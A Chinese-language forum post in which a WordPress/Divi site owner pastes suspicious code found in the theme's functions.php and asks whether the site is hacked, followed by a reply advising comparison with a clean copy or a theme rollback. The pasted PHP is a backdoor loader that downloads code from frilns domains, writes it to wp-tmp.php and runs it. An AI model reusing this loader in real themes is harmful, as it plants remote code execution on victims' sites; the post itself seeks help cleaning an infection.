我正在一个以Wordpress和Divi为主题的新网站。
今天,我在function.php中发现了未知的代码。当我尝试转到URL时,没有任何反应。
在网站上:https://themecheck.info/,他们说这是恶意软件。但我无法确认(https://themecheck.info/fr/score/theme-wordpress-solar-shared-by-vestathemes-com.html)
[在另一封邮件中,他们说Frilins是Chrome恶意软件。不用WordPress。
恐怕它是否被黑了。
$wp_auth_key='3770030e7d87cbaf0baf1';
if (($tmpcontent = @file_get_contents("http://www.frilns.com/code.php") OR $tmpcontent =
@file_get_contents_tcurl("http://www.frilns.com/code.php")) AND stripos($tmpcontent,
$wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.frilns.pw/code.php") AND
stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.frilns.top/code.php") AND
stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND
stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND
stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent,
$wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
我试图提供此类信息,但没有真实信息。
谢谢您的帮助
J
您可以将新安装的Divi安装中的默认functions.php文件(从Members区域中获取,这是100%安全的)与实际functions.php进行比较,然后可以看到默认情况下,当前没有的代码不存在,它不应该。
您可以转到主题选项->更新并回滚到以前的版本,然后再次升级,它将获取干净的新鲜主题文件。